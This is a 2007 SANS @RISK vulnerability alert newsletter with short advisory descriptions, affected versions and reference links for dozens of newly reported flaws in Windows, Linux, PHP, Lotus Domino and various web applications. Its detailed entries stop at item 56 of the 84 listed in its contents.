@RISK: The Consensus Security Vulnerability Alert

Part I -- Critical Vulnerabilities from TippingPoint (www.tippingpoint.com)

Widely Deployed Software

• (1) CRITICAL: Microsoft Windows ANI File Format Vulnerability (0-day)
• (2) CRITICAL: Computer Associates BrightStor "mediasrvr.exe" Buffer Overflow (0-day)
• (3) CRITICAL: IBM Lotus Domino Multiple Vulnerabilities
• (4) HIGH: America Online SuperBuddy ActiveX Control Remote Code Execution
• (5) HIGH: Corel WordPerfect Office Overlong Printer Name Buffer Overflow
• (6) HIGH: Cisco Unified CallManager Multiple Denial of Service Vulnerabilities

Other Software

• (7) CRITICAL: SignKorea SKCommAX ActiveX Control Buffer Overflow
• (8) HIGH: InterVetions NaviCopa HTTP Server Buffer Overflow

Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)

Windows

• 07.14.1 - Microsoft Windows Cursor And Icon ANI Format Handling Remote Code Execution

Other Microsoft Products

• 07.14.2 - Microsoft Internet Explorer HTML Denial of Service

Third Party Windows Apps

• 07.14.3 - Computer Associates BrightStor ARCserve Backup Buffer Overflow
• 07.14.4 - FastStone Image Viewer Unspecified Buffer Overflow
• 07.14.5 - IBM Lotus SameTime STJNILoader.OCX ActiveX Control LoadLibrary Input Validation
• 07.14.6 - NaviCopa Web Server GET Request Buffer Overflow
• 07.14.7 - Corel WordPerfect Office PRS Stack Buffer Overflow
• 07.14.8 - SignKorea SKCommAX ActiveX Control Remote Buffer Overflow
• 07.14.9 - B21Soft BASP21 BSMTP.DLL CRLF Injection

Linux

• 07.14.10 - Linux Kernel DCCP Local Information Disclosure
• 07.14.11 - Inkscape Client Malicious Jabber Server Format String
• 07.14.12 - Linux Kernel IPV6_SockGlue.c NULL Pointer Dereference

BSD

• 07.14.13 - NetBSD ISO(4) Buffer Overflow

Unix

• 07.14.14 - Mod_Perl Path_Info Remote Denial of Service
• 07.14.15 - CUPS Partial SSL Connection Remote Denial of Service

Cross Platform

• 07.14.16 - Multiple Hitachi JP1/HiCommand Products Local Information Disclosure
• 07.14.17 - CruiseWorks and Minna De Office Access Restrictions Bypass
• 07.14.18 - PHP Multiple Functions Reference Parameter Information Disclosure
• 07.14.19 - TrueCrypt Mount Set-EUID Local Privilege Escalation
• 07.14.20 - Cisco Unified CallManager And Unified Server Multiple Remote Denial Of Service Vulnerabilities
• 07.14.21 - Data Domain Administration Interface Local Privilege Escalation
• 07.14.22 - PHP Session.Save_Path() TMPDIR Open_Basedir Restriction Bypass
• 07.14.23 - IBM Lotus Domino Web Access Unspecified Cross-Site Scripting
• 07.14.24 - IBM Lotus Domino IMAP Unspecified Buffer Overflow
• 07.14.25 - IBM Lotus Domino LDAP Server Task Unspecified Buffer Overflow
• 07.14.26 - ESRI ArcSDE Server Unspecified Denial of Service
• 07.14.27 - PHP Zip_Entry_Read() Integer Overflow
• 07.14.28 - HP OpenView Network Node Manager Unspecified Remote Unauthorized Access
• 07.14.29 - HP Jetdirect FTP Print Server RERT Command Denial of Service
• 07.14.30 - High Performance Anonymous FTP Server Multiple Remote Buffer Overflow Vulnerabilities
• 07.14.31 - Asterisk PBX_AEL.C Switch Blocks Security Bypass
• 07.14.32 - PHP Folded Mail Headers Email Header Injection
• 07.14.33 - Fizzle RSS Feed HTML Injection
• 07.14.34 - TrueCrypt Dismount Set-EUID Local Denial of Service
• 07.14.35 - Sun Java System Directory Server Uninitialized Pointer Remote Memory Corruption
• 07.14.36 - PHP Hash Table Overwrite Arbitrary Code Execution
• 07.14.37 - PHP Session Data Deserialization Arbitrary Code Execution
• 07.14.38 - PHP Session_Decode Double Free Memory Corruption
• 07.14.39 - PHPDoc Confirm_Phpdoc_Compiled Local Buffer Overflow
• 07.14.40 - dproxy Stack-Based Buffer Overflow
• 07.14.41 - DataRescue IDA Pro Processor_Request Authentication Bypass

Web Application - Cross Site Scripting

• 07.14.42 - Overlay Weaver Unspecified Cross-Site Scripting
• 07.14.43 - aBitWhizzy Multiple Cross-Site Scripting and Directory Traversal Vulnerabilities
• 07.14.44 - Mephisto Blog Search Function Cross-Site Scripting
• 07.14.45 - CcCounter Index.PHP Cross-Site Scripting

Web Application - SQL Injection

• 07.14.46 - Picture-Engine Wall.PHP SQL Injection
• 07.14.47 - Hitachi Multiple Products Unspecified SQL Injection
• 07.14.48 - Xoops Friendfinder Module View.PHP SQL Injection
• 07.14.49 - Xoops Print.PHP SQL Injection
• 07.14.50 - FlexBB Start.PHP SQL Injection
• 07.14.51 - Joomla! D4J eZine Component Index.PHP SQL Injection
• 07.14.52 - IceBB Avatar Upload Index.PHP SQL Injection
• 07.14.53 - Webformatique Car Manager Joomla Component Index.PHP SQL Injection
• 07.14.54 - Joomla RWCards Component SQL Injection
• 07.14.55 - Multiple ActiveWebSoftwares Products Default.ASP SQL Injection
• 07.14.56 - ActiveBuyAndSell BuyerSend.ASP SQL Injection
• 07.14.57 - Active Newsletter ViewNewspapers.ASP SQL Injection

Web Application

• 07.14.58 - sBlog Local File Include
• 07.14.59 - Kaqoo Auction Install_Root Multiple Remote File Include Vulnerabilities
• 07.14.60 - Softerra Time-Assistant Multiple Remote File Include Vulnerabilities
• 07.14.61 - CodeBB PHPBB_Root_Path Remote File Include
• 07.14.62 - MsxStudios Advanced Login ProfileEdit.PHP Remote File Include
• 07.14.63 - LDAP Account Manager Unspecified HTML Injection
• 07.14.64 - MangoBery Multiple Remote File Include Vulnerabilities
• 07.14.65 - AY System Solutions Web Content System Remote File Include
• 07.14.66 - Eve-Nuke Forums MySQL.PHP Remote File Include
• 07.14.67 - JBrowser Upload.PHP3 Arbitrary File Upload
• 07.14.68 - IceBB Avatar Upload Remote PHP Code Execution
• 07.14.69 - C-Arbre Multiple Remote File Include Vulnerabilities
• 07.14.70 - SB-WebSoft Addressbook Local File Include
• 07.14.71 - Horde Groupware Webmail Edition Unspecified Parameters Multiple HTML Injection Vulnerabilities
• 07.14.72 - Mephisto Blog Author Comment HTML Injection
• 07.14.73 - ttCMS EZ_SQL.PHP Remote File Include
• 07.14.74 - Satel Lite Satellite.PHP Local File Include
• 07.14.75 - PBLang Administrative Account Creation Privilege Escalation
• 07.14.76 - Joomla Joomlaboard Component Multiple Remote File Include Vulnerabilities
• 07.14.77 - Net Side CMS Index.PHP Remote File Include
• 07.14.78 - Image_Upload Script Multiple Remote File Include Vulnerabilities
• 07.14.79 - File Upload System Multiple Remote File Include Vulnerabilities
• 07.14.80 - Mambo FlatMenu Module MosConfig_Absolute_Path Remote File Include
• 07.14.81 - Mambo SWmenu MosConfig_Absolute_Path Parameter Multiple Remote File Include Vulnerabilities
• 07.14.82 - RoseOnlineCMS Op Local File Include
• 07.14.83 - Philex Remote and Local File Include Vulnerabilities
• 07.14.84 - UHP for Mambo UHP_Config.PHP Remote File Include

PART I Critical Vulnerabilities

Part I for this issue has been compiled by Rob King and Rohit Dhamankar at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 14, 2007

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 5411 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.

• 07.14.1 - CVE: Not Available
• Platform: Windows
• Title: Microsoft Windows Cursor And Icon ANI Format Handling Remote Code Execution
• Description: Microsoft Windows is exposed to an issue which can result in the execution of arbitrary code remotely. This issue occurs due to a memory corruption error caused when handling malformed ANI cursor or icon files. Windows XP SP2 and Windows Server 2003 SP1 when running Internet Explorer versions 6 and 7 are affected.
• Ref: http://www.avertlabs.com/research/blog/?p=230

• 07.14.2 - CVE: Not Available
• Platform: Other Microsoft Products
• Title: Microsoft Internet Explorer HTML Denial of Service
• Description: Microsoft Internet Explorer is exposed to a denial of service issue because it fails to handle a malformed web page properly. The issue occurs when the application processes a malicious page containing an excessive amount of "0x90" instructions in between the "HTML", "HEAD" and "TITLE" HTML tags. Microsoft Internet Explorer version 7 is affected.
• Ref: http://www.securityfocus.com/bid/23178

• 07.14.3 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: Computer Associates BrightStor ARCserve Backup Buffer Overflow
• Description: Computer Associates BrightStor ARCserve Backup products provide backup and restore protection for Windows, NetWare, Linux, and UNIX servers as well as Windows, Mac OS X, Linux, UNIX, AS/400, and VMS clients. The application is affected by a remote buffer overflow issue because the application fails to perform proper bounds checking on data supplied to the application. Computer Associates BrightStor ARCServe Backup for Windows 11.0, and Computer Associates BrightStor ARCServe Backup versions 11.5 and earlier are affected.
• Ref: http://www.securityfocus.com/bid/23209

• 07.14.4 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: FastStone Image Viewer Unspecified Buffer Overflow
• Description: FastStone Image Viewer is an application that allows users to view images. The application is exposed to an unspecified stack-based buffer overflow issue because it fails to bounds check user-supplied data before copying it into an insufficiently sized buffer. FastStone Image Viewer version 2.8 is affected.
• Ref: http://www.securityfocus.com/bid/23196

• 07.14.5 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: IBM Lotus SameTime STJNILoader.OCX ActiveX Control LoadLibrary Input Validation
• Description: IBM Lotus Sametime is a realtime web conferencing application. The Sametime STJNILoader.ocx ActiveX control is vulnerable to an input validation issue because the control fails to adequately sanitize user-supplied input to the exported "LoadLibrary" function. STJNILoader 3.1.0.26 and Sametime 7.0 are affected. Ref: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=495

• 07.14.6 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: NaviCopa Web Server GET Request Buffer Overflow
• Description: NaviCOPA Web Server is a commercially available webserver application for Microsoft Windows operating systems. The application is exposed to a buffer overflow issue because it fails to adequately bounds check user-supplied data before copying it to an insufficiently sized buffer. NaviCOPA version 2.01 is affected.
• Ref: http://www.securityfocus.com/archive/1/463931

• 07.14.7 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: Corel WordPerfect Office PRS Stack Buffer Overflow
• Description: Corel WordPerfect Office is a software suite which provides word processing, spreadsheet, presentation and email applications for the Microsoft Windows operating system. The application is exposed to a stack-based buffer overflow issue because the software fails to adequately bounds check user-supplied data before copying it to an insufficiently sized buffer. WordPerfect X3 version 13.0.0.565 is affected.
• Ref: http://www.securityfocus.com/archive/1/464046

• 07.14.8 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: SignKorea SKCommAX ActiveX Control Remote Buffer Overflow
• Description: SignKorea SKCommAX ActiveX Control is a web-based component for the SignKorea SKCommAX application. The application is exposed to a buffer overflow issue because it fails to properly check boundaries on user-supplied data before copying it to an insufficiently sized buffer. SignKorea SKCommAX ActiveX Control versions 7.2.0.2 and 6.6.0.1 are affected.
• Ref: http://www.securityfocus.com/bid/23149

• 07.14.9 - CVE: Not Available
• Platform: Third Party Windows Apps
• Title: B21Soft BASP21 BSMTP.DLL CRLF Injection
• Description: BASP21 is an SMTP component produced by B21Soft. The application is exposed to a CRLF injection issue because unspecified functions in the "BSTMP.DLL" library fail to properly sanitize input when constructing and sending email message. BASP21 version 2003.0211 and BASP21 Pro versions 1.0.702.27 and earlier are affected.
• Ref: http://www.securityfocus.com/bid/23134

• 07.14.10 - CVE: Not Available
• Platform: Linux
• Title: Linux Kernel DCCP Local Information Disclosure
• Description: DCCP is the Datagram Congestion Control Protocol. DCCP is IP protocol 33 and is designed to be a transport level protocol that provides congestion control similarl to TCP but does not provide reliability or retransmission features. Please refer to the advisory for further details. Linux kernel versions 2.6.20.4 and earlier are affected.
• Ref: http://www.securityfocus.com/archive/1/463934

• 07.14.11 - CVE: CVE-2007-1463, CVE-2007-1464
• Platform: Linux
• Title: Inkscape Client Malicious Jabber Server Format String
• Description: Inkscape is an open-source vector graphics editor. The Inkscape client application is exposed to a format string issue because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted printing function. Please refer to the advisory for further details.
• Ref: http://www.securityfocus.com/bid/23138

• 07.14.12 - CVE: Not Available
• Platform: Linux
• Title: Linux Kernel IPV6_SockGlue.c NULL Pointer Dereference
• Description: The Linux kernel is exposed to a NULL pointer dereference issue in the "do_ipv6_setsockopt()" function of the "net/ipv6/ipv6_sockglue.c" file. Please refer to the advisory for further details.
• Ref: http://www.securityfocus.com/bid/23142

• 07.14.13 - CVE: CVE-2007-1677
• Platform: BSD
• Title: NetBSD ISO(4) Buffer Overflow
• Description: The ISO protocol family is a collection of protocols that uses the ISO address format. NetBSD ISO is exposed to a local buffer overflow issue because it fails to properly bounds check user-supplied input before copying it to an insufficiently sized memory buffer. Please refer to the advisory for further details.
• Ref: http://www.securityfocus.com/bid/23193

• 07.14.14 - CVE: CVE-2007-1349
• Platform: Unix
• Title: Mod_Perl Path_Info Remote Denial of Service
• Description: The "mod_perl" module is an Apache module that adds the Perl scripting language to the Apache webserver. The module is exposed to a remote denial of service issue when an attacker sends specially crafted data through the "path_info" parameter in a URI. Please refer to the advisory for further details.
• Ref: http://www.securityfocus.com/bid/23192

• 07.14.15 - CVE: CVE-2007-0720
• Platform: Unix
• Title: CUPS Partial SSL Connection Remote Denial of Service
• Description: Easy Software Products CUPS (Common Unix Printing System) is a widely used set of printing utilities for Unix-based systems. The application is exposed to a remote denial of service issue when the service handles SSL requests that are not completely negotiated. CUPS versions 1.2.10 and earlier are affected.
• Ref: http://www.securityfocus.com/archive/1/463846

• 07.14.16 - CVE: Not Available
• Platform: Cross Platform
• Title: Multiple Hitachi JP1/HiCommand Products Local Information Disclosure
• Description: Hitachi JP1/HiCommand is a series of software products used to monitor and manage data storage infrastructures. The products are exposed to an information disclosure issue due to an unspecified error. Please refer to the advisory for further details. Ref: http://www.hitachi-support.com/security_e/vuls_e/HS07-007_e/index-e.html

• 07.14.17 - CVE: Not Available
• Platform: Cross Platform
• Title: CruiseWorks and Minna De Office Access Restrictions Bypass
• Description: Kynos Logic Inc. Cruiseworks and Asian Technology Co, LTD. Minna De Office are groupware applications available for Windows and Linux operating platforms. Both applications are exposed to an access restriction bypass issue because they fail to implement adequate access restrictions. CruiseWorks 1.09e and Minna De Office 2.0, 1.12, and prior versions are affected.
• Ref: http://www.securityfocus.com/bid/23198

• 07.14.18 - CVE: Not Available
• Platform: Cross Platform
• Title: PHP Multiple Functions Reference Parameter Information Disclosure
• Description: PHP is exposed to an information disclosure vulnerability due to a design error. PHP versions 4 through 4.4.6 and 5 through 5.2.1 are affected.
• Ref: http://www.php-security.org/MOPB/MOPB-37-2007.html

• 07.14.19 - CVE: Not Available
• Platform: Cross Platform
• Title: TrueCrypt Mount Set-EUID Local Privilege Escalation
• Description: Truecrypt is an open source application to encrypt files. The application is exposed to a local privilege escalation issue due to a failure in the application to properly verify permissions before mounting files. Truecrypt version 4.3 is affected.
• Ref: http://www.securityfocus.com/archive/1/464064

• 07.14.20 - CVE: Not Available
• Platform: Cross Platform
• Title: Cisco Unified CallManager And Unified Server Multiple Remote Denial Of Service Vulnerabilities
• Description: Cisco Unified CallManager (CUCM) is the call processing component for the CiscO IP telephony solution. Cisco Unified Presence Server (CUPS) is an indentity tracking component of the Cisco IP telephony solution. The application is exposed to multiple remote denial of service issues because the devices fail to handle certain network packets or network requests. Please refer to the advisory for further details. Ref: http://www.cisco.com/en/US/products/products_security_advisory09186a008080f17b.shtml

• 07.14.21 - CVE: Not Available
• Platform: Cross Platform
• Title: Data Domain Administration Interface Local Privilege Escalation
• Description: Data Domain is a disk backup and data protection application. The application is exposed to a local privilege escalation issue because the application fails to sanitize user-supplied input before passing it to a UNIX shell for execution. Data Domain versions 3.0.0 through 4.0.3.5 are affected.
• Ref: http://www.securityfocus.com/archive/1/464085

• 07.14.22 - CVE: Not Available
• Platform: Cross Platform
• Title: PHP Session.Save_Path() TMPDIR Open_Basedir Restriction Bypass
• Description: PHP is a general purpose scripting language that is especially suited for web development and can be embedded into HTML. The application is exposed to an "open_basedir" restriction bypass issue. PHP 4 up to and including 4.4.6, and PHP 5 up to and including 5.2.1 are affected.
• Ref: http://www.php-security.org/MOPB/MOPB-36-2007.html#top

• 07.14.23 - CVE: Not Available
• Platform: Cross Platform
• Title: IBM Lotus Domino Web Access Unspecified Cross-Site Scripting
• Description: IBM Lotus Domino Web Access is a messaging and personal information manager available for Linux, UNIX, and Microsoft Windows. The application is exposed to cross-site scripting attacks because it fails to sufficiently sanitize user-supplied input before displaying it in dynamically generated content. IBM Lotus Domino versions 7.0.2 and earlier are affected. Ref: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=493

• 07.14.24 - CVE: CVE-2007-1675
• Platform: Cross Platform
• Title: IBM Lotus Domino IMAP Unspecified Buffer Overflow
• Description: IBM Lotus Domino is a client/server product designed for collaborative working environments. Domino is designed for email, scheduling, instant messaging and data-driven applications. The application is exposed to a remote buffer overflow issue because it fails to properly bounds check user-supplied data before copying it to an insufficiently sized memory buffer.
• Ref: http://www.zerodayinitiative.com/advisories/ZDI-07-011.html

• 07.14.25 - CVE: Not Available
• Platform: Cross Platform
• Title: IBM Lotus Domino LDAP Server Task Unspecified Buffer Overflow
• Description: IBM Lotus Domino is a client/server product designed for collaborative working environments. Domino is designed for email, scheduling, instant messaging, and data-driven applications. The application is exposed to a remote buffer overflow vulnerability because it fails to properly bounds check user-supplied data before copying it to an insufficiently sized memory buffer. IBM Lotus Domino 7.0.2 and earlier versions are affected. Ref: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=494

• 07.14.26 - CVE: Not Available
• Platform: Cross Platform
• Title: ESRI ArcSDE Server Unspecified Denial of Service
• Description: ESRI ArcSDE Server is used to access multiuser geographic databases. The application is exposed to a remote denial of service issue due to an unspecified error. ESRI ArcSDE Server versions 8.3, 9.0 and 9.1 are affected. Ref: http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=19&MetaID=1260

• 07.14.27 - CVE: Not Available
• Platform: Cross Platform
• Title: PHP Zip_Entry_Read() Integer Overflow
• Description: PHP is a general purpose scripting language that is especially suited for web development and can be embedded into HTML. The application is exposed to an integer overflow issue because it fails to ensure that integer values aren't overrun. PHP versions prior to 4.4.5 are affected.
• Ref: http://www.php-security.org/MOPB/MOPB-35-2007.html

• 07.14.28 - CVE: Not Available
• Platform: Cross Platform
• Title: HP OpenView Network Node Manager Unspecified Remote Unauthorized Access
• Description: HP OpenView Network Node Manager is a network management application. It is exposed to an unspecified, unauthorized access issue. HP OpenView versions 6.20, 7.01, 7.50, 7.51 and versions in the 6.40 branch are affected. Please refer to the advisory for further details.
• Ref: http://www.securityfocus.com/bid/23163

• 07.14.29 - CVE: Not Available
• Platform: Cross Platform
• Title: HP Jetdirect FTP Print Server RERT Command Denial of Service
• Description: HP JetDirect FTP Print Server provides network connectivity between printers and computers. The application is exposed to a remote denial of service issue which occurs when the "RERT" command is passed a filename consisting of 271 to 277 characters. FTP Print Server 2.4 and prior versions are affected.
• Ref: http://www.securityfocus.com/bid/23168

• 07.14.30 - CVE: Not Available
• Platform: Cross Platform
• Title: High Performance Anonymous FTP Server Multiple Remote Buffer Overflow Vulnerabilities
• Description: High Performance Anonymous FTP Server is an FTP (File Transfer Protocol) application. It is exposed to multiple buffer overflow issues because it fails to do proper bounds checking. High Performance Anonymous FTP server version 1.01 is affected.
• Ref: http://www.securiteam.com/securitynews/5AP0L1PKUU.html

• 07.14.31 - CVE: Not Available
• Platform: Cross Platform
• Title: Asterisk PBX_AEL.C Switch Blocks Security Bypass
• Description: Asterisk is an open source PBX application available for multiple operating platforms. The Asterisk Extension Language (AEL) is a programming language designed for use with Asterisk PBX systems. The application is exposed to a security bypass issue because the AEL fails to securely generate extensions when compiling arbitrary labels. Asterisk affects versions in the 1.2.0 and 1.4.0 branches.
• Ref: http://www.securityfocus.com/bid/23155

• 07.14.32 - CVE: Not Available
• Platform: Cross Platform
• Title: PHP Folded Mail Headers Email Header Injection
• Description: PHP is a general purpose scripting language that is especially suited for web development and can be embedded into HTML. The package is exposed to an email header injection issue because it fails to properly sanitize data in the "mail()" function when handling the "Subject" and "To" headers in folded mail headers. PHP 4 versions up to and including 4.4.6, and PHP 5 versions up to and including 5.2.1 are affected.
• Ref: http://www.php-security.org/MOPB/MOPB-34-2007.html

• 07.14.33 - CVE: Not Available
• Platform: Cross Platform
• Title: Fizzle RSS Feed HTML Injection
• Description: Fizzle RSS/Atom is a feed reader plugin for Mozilla Firefox. The application is exposed to an HTML injection issue because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Fizzle RSS version 0.5 is affected.
• Ref: http://www.securityfocus.com/bid/23144

• 07.14.34 - CVE: CVE-2007-1589
• Platform: Cross Platform
• Title: TrueCrypt Dismount Set-EUID Local Denial of Service
• Description: Truecrypt is an open source application to encrypt files. The application is exposed to a local denial of service issue when users are able to dismount mounted volumes when "set-euid" mode is enabled. Truecrypt versions prior to 4.3 are affected.
• Ref: http://www.securityfocus.com/bid/23128

• 07.14.35 - CVE: CVE-2006-4175
• Platform: Cross Platform
• Title: Sun Java System Directory Server Uninitialized Pointer Remote Memory Corruption
• Description: Sun Java System Directory Server is an LDAP (Lightweight Directory Access Protocol) server distributed with multiple Sun products. The issue exists in the "ns-slapd" daemon/server when processing clean up code after certain failed queries. Sun Java System Directory Server versions prior to 5.2 Patch5 are affected. Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102853-1&searchclause=

• 07.14.36 - CVE: Not Available
• Platform: Cross Platform
• Title: PHP Hash Table Overwrite Arbitrary Code Execution
• Description: PHP is a general purpose scripting language that is especially suited for web development and can be embedded into HTML. The application is exposed to an arbitrary code execution issue which occurs because the session extension does not set a proper value for the reference count for session variables. PHP 4 versions prior to 4.4.5, and PHP 5 versions prior to 5.2.1 are affected.
• Ref: http://www.php-security.org/MOPB/MOPB-30-2007.html

• 07.14.37 - CVE: Not Available
• Platform: Cross Platform
• Title: PHP Session Data Deserialization Arbitrary Code Execution
• Description: PHP is a general purpose scripting language that is especially suited for web development and can be embedded into HTML. The application is exposed to an arbitrary code execution issue when "register_globals" is activated, and session data can be deserialized to overwrite the PHP "_SESSION" array. PHP 4 versions prior to 4.4.5, and PHP 5 versions prior to 5.2.1 are affected.
• Ref: http://www.php-security.org/MOPB/MOPB-31-2007.html

• 07.14.38 - CVE: Not Available
• Platform: Cross Platform
• Title: PHP Session_Decode Double Free Memory Corruption
• Description: PHP is exposed to a double free memory corruption issue. PHP versions 4.4.5 and 4.4.6 are affected. Please refer to the advisory for further details.
• Ref: http://www.php-security.org/MOPB/MOPB-32-2007.html

• 07.14.39 - CVE: Not Available
• Platform: Cross Platform
• Title: PHPDoc Confirm_Phpdoc_Compiled Local Buffer Overflow
• Description: PHPDoc is a PHP extension that is used to generate API documentation of object oriented and procedural code. PHPDoc is also called PhpDocumentor. The application is exposed to a local buffer overflow issue because it fails to perform boundary checks before copying user-supplied data to insufficiently sized memory buffers. All versions of PHPDoc are affected.
• Ref: http://www.securityfocus.com/archive/1/463843

• 07.14.40 - CVE: CVE-2007-1465
• Platform: Cross Platform
• Title: dproxy Stack-Based Buffer Overflow
• Description: dproxy is a small, freely available caching DNS server. The application is exposed to a stack-based buffer overflow issue because it fails to properly check boundaries on user-supplied data before copying it to an insufficiently sized buffer. Matthew Pratt dproxy versions 0.1 through 0.5 are affected.
• Ref: http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/053146.html

• 07.14.41 - CVE: Not Available
• Platform: Cross Platform
• Title: DataRescue IDA Pro Processor_Request Authentication Bypass
• Description: DataRescue IDA Pro is a debugger and disassembler. It includes a remote debugger server over TCP/IP. Users can specify whether a password is required by using the "-P" command line option. The application is exposed to an authentication bypass issue because it fails to check whether the "require-authentication" flag has been specified. DataRescue IDA Pro versions 4.8 through 5.1 are affected. Ref: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=492

• 07.14.42 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: Overlay Weaver Unspecified Cross-Site Scripting
• Description: Overlay Weaver is a web-based search engine. The application is exposed to a cross-site scripting issue because it fails to properly sanitize input. This issue resides in the DHT shell. Overlay Weaver versions 0.5.9 to 0.5.11 are affected. Please refer to the advisory for further details.
• Ref: http://overlayweaver.sourceforge.net/news/20070329/

• 07.14.43 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: aBitWhizzy Multiple Cross-Site Scripting and Directory Traversal Vulnerabilities
• Description: aBitWhizzy is a PHP script that uses whizzywig.js to create and edit web pages through a WYSIWYG interface. The application is exposed to multiple cross-site scripting and directory traversal issues because it fails to sufficiently sanitize user-supplied input to the "d" parameter.
• Ref: http://www.securityfocus.com/bid/23167

• 07.14.44 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: Mephisto Blog Search Function Cross-Site Scripting
• Description: Mephisto Blog is a web log application, implemented in Ruby. The application is exposed to a cross-site scripting issue because it fails to properly sanitize user-supplied input to the "dir" parameter of the "index.php" script. Mephisto Blog version 0.7.3 is affected.
• Ref: http://www.securityfocus.com/bid/23141

• 07.14.45 - CVE: Not Available
• Platform: Web Application - Cross Site Scripting
• Title: CcCounter Index.PHP Cross-Site Scripting
• Description: CcCounter is a web site hit counter application. It is exposed to a cross-site scripting issue because it fails to properly sanitize user-supplied input to the "dir" parameter of the "index.php" script. CcCounter version 2.0 is affected.
• Ref: http://www.securityfocus.com/archive/1/463820

• 07.14.46 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Picture-Engine Wall.PHP SQL Injection
• Description: Picture Engine is a web-based image gallery management system. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "cat" parameter of the "wall.php" script before using it in an SQL query. Picture-Engine versions 1.2.0 and earlier are affected.
• Ref: http://www.securityfocus.com/bid/23205

• 07.14.47 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Hitachi Multiple Products Unspecified SQL Injection
• Description: Multiple Hitachi products are exposed to an SQL injection issue because they fail to properly sanitize user-supplied input to unspecified parameters before using it in an SQL query. Ref: http://www.hitachi-support.com/security_e/vuls_e/HS07-008_e/index-e.html

• 07.14.48 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Xoops Friendfinder Module View.PHP SQL Injection
• Description: The Xoops Friendfinder module is a social networking module application. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "view.php" script before using it in an SQL query. Xoops Friendfinder module versions 3.3 and prior are affected.
• Ref: http://www.securityfocus.com/bid/23184

• 07.14.49 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Xoops Print.PHP SQL Injection
• Description: Xoops is a web portal application. The application is exposed to an SQL-injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "print.php" script before using it in an SQL query. Xoops versions 2.0.16 and prior are affected.
• Ref: http://www.securityfocus.com/bid/23160

• 07.14.50 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: FlexBB Start.PHP SQL Injection
• Description: FlexBB is a web-based bulletin board application. It is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "$_COOKIE["flexbb_lang_id"]" parameter of the "Includes/Start.php" script file before using it in an SQL query.
• Ref: http://www.securityfocus.com/archive/1/463917

• 07.14.51 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Joomla! D4J eZine Component Index.PHP SQL Injection
• Description: D4J eZine is a newspaper/magazine application for the Joomla! content management system. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "article" parameter of the "index.php" script before using it in an SQL query. D4J eZine version 2.8 is affected.
• Ref: http://www.securityfocus.com/bid/23165

• 07.14.52 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: IceBB Avatar Upload Index.PHP SQL Injection
• Description: IceBB is a bulletin-board system. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data when uploading avatar images. IceBB version 1.0-rc5 is affected.
• Ref: http://www.securityfocus.com/bid/23158

• 07.14.53 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Webformatique Car Manager Joomla Component Index.PHP SQL Injection
• Description: Webformatique Car Manager is a component for the Joomla! CMS which allows users to publish car rental information on the web; it is implemented in PHP. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "id" parameter of the "index.php" script before using it in an SQL query. Webformatique versions 1.1 and earlier are affected.
• Ref: http://www.securityfocus.com/bid/23131

• 07.14.54 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Joomla RWCards Component SQL Injection
• Description: Joomla RWCards Component is a component for Joomla to send E-Cards. The application is exposed to an SQL injection issue because it fails to sufficiently sanitize user-supplied data to the "category_id" parameter of the "index.php" script before using it in an SQL query. Joomla version 2.4.3 and earlier are affected.
• Ref: http://www.securityfocus.com/bid/23126

• 07.14.55 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: Multiple ActiveWebSoftwares Products Default.ASP SQL Injection
• Description: Active Trade and Active Auction House are web-based auction applications. The applications are exposed to an SQL injection issue because they fail to properly sanitize user-supplied input before using the "catid" parameter of the "default.asp" script in SQL queries. Active Web Softwares Active Trade version 2.0 and Auction House version 3.6 are affected.
• Ref: http://www.securityfocus.com/bid/23109

• 07.14.56 - CVE: Not Available
• Platform: Web Application - SQL Injection
• Title: ActiveBuyAndSell BuyerSend.ASP SQL Injection
• Description: ActiveBuyandSell is a web-based shopping cart. The application is exposed to an SQL injection issue because it fails to properly sanitize user-supplied input to the "catid" parameter of the "buyersend.asp" script before using it in an SQL query. ActiveBuyandSell version 6.2 is affected.
• Ref: http://www.securityfocus.com/bid/23110

